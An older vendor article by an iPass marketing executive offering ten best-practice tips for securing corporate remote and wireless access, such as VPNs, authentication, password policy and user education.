Seemingly overnight, remote connectivity to corporate resources became a business imperative. And with each new access method, a related technology also emerged for securing this endless array of wired, wireless and broadband connections.

So how do IT departments keep mobile employees productive while still protecting valuable corporate resources? The following tips provide a “best-practice” approach to achieving secure remote connectivity in today’s increasingly complex environment that we at iPass have learned over the years from working with corporations with large mobile workforces.

As IT departments refine security policies for their companies, it makes sense for them to review best practice recommendations from every vendor that provides critical components to their IT system, such as operating systems, anti-virus protection, firewalls, personal firewall software and virtual private networking solutions.

1. Base Security Policies on Individual Risk Assessment
Risk assessment is a critical component of any defense-in-depth strategy. As IT departments consider corporate threats, vulnerabilities and operational risks, keep in mind that with remote access it’s essential IT departments weigh needs against the specific potential risks of individuals, understanding the similarities and differences between different classes of users.

2. Conduct Annual Security Policy Audits
Companies are in a constant state of change. Shifting business processes, personnel, vendors and corporate priorities require regular security policy review. An annual security policy audit can align a company’s current needs with the proper security measures.

3. Require Authentication and User Credential Protection
Some remote access providers offer the ability to forward authentication to the corporate-owned infrastructure. Other providers choose to deploy a separate authentication database.

Regardless of which approach IT departments choose the following tips will help strengthen security:

Ensure that all communications through the firewall are validated by the use of digital certificates.

Protect user credentials from the connectivity client all the way to the enterprise network.

Beware of provider implementations based solely on RADIUS proxy authentication networks. These either send credentials in clear text or at best employ a simple algorithm that can be easily broken.

Make sure some form of credential protection is available over the initial link between the notebook or PDA and the network access point. This has become increasingly important with the advent of Wi-Fi hotspots and Wi-Fi home networks.

For additional security measures deploy advanced authentication systems such as tokens and digital certificates to validate a user’s identity and initiate a unique network session.

4. Actively Manage Passwords
Develop password policies such as insisting on passwords that are complex enough to withstand dictionary attacks, yet memorable enough to avoid being written down or forgotten. Create passwords that are a combination of both letters and numbers. Require regular password changes, and enforce password changes at regular intervals. Disable any password auto save features as they can turn a stolen or compromised notebook into an open door to the corporate network.

5. Ratchet Down Firewalls
Limiting sources of Internet traffic is a good way to limit access to the corporate network. One easy way to mitigate security risk is by only allowing traffic to enter the firewall from a single service provider’s IP address. Additionally, make sure all devices are protected with a properly configured personal firewall.

6. Use Secure VPN Tunnels
High-speed broadband connections help mobile employees work faster and smarter at home, in hotel rooms and in public venues. However, these always-on links also present attractive targets as backdoor entry-points to the corporate LAN. That’s why use of virtual private networking for remote and mobile workers has become a business imperative.

7. Manage Security Policies Centrally
Security management, by its very nature, is a multi-layer process that involves best-in-class tools from multiple vendors and numerous administration consoles. The distributed nature of remote access further complicates this. Choose a remote access service that offers central policy management in order to simplify policy administration and enforcement of both basic remote network access and third-party security products.

8. Don’t Compromise on Wireless Security
Wireless access presents additional challenges to corporate security. The following suggestions can strengthen security on the corporate campus or at the homes of employees who may use wireless LANs, Wi-Fi hotspots and broadband connections to access the corporate network.

Change the default admin password of your wireless router/access points

Use Media Access Control (MAC) address filtering and Wired Equivalent Privacy (WEP)

Keep wireless router/access point firmware up to date

Turn down the power so that the wireless network is not broadcasting its signal farther than necessary.

Use VPN-based access for corporate wireless LANs

Pay special attention to hotspot access

Require VPNs for home wireless access

9. Educate End-Users about Network Security
The average end-user generally has neither a complete understanding of the need for network security nor an awareness of potential network vulnerabilities. Such vulnerabilities include a Wi-Fi user activating file sharing on his notebook thus letting others see what’s on his hard drive. Once end-users realize how a security breach can affect their company—and their livelihood—it’s amazing how security conscious they become.

10. Use Monitoring and Management Tools to Refine Security Policies
Any remote access solution must include tools that allow customers to monitor and manage connections. Not only does this capability provide valuable connection data to help IT staff, it also helps corporate the IT department to spot potential abuse patterns, identify end users who could benefit from training, and create special monitoring practices for high-risk users and users with high-value corporate data on their notebooks.

Jon Russo is vice president of marketing at iPass [NASD:IPAS], a remote connectivity solutions company. He joined iPass in December 2001 after serving as vice president of marketing for Frontier Communications where he drove the strategies for data, Web, managed security and Internet Protocol (IP) services, which was acquired by Global Crossing. Russo came to Frontier after his content distribution startup, GlobalCenter, had been acquired. Before his commercial experiences, Jon was a telecommunications officer in the United States Army. He holds an MBA from the University of California, Berkeley, and a bachelor’s degree in finance from the University of Connecticut.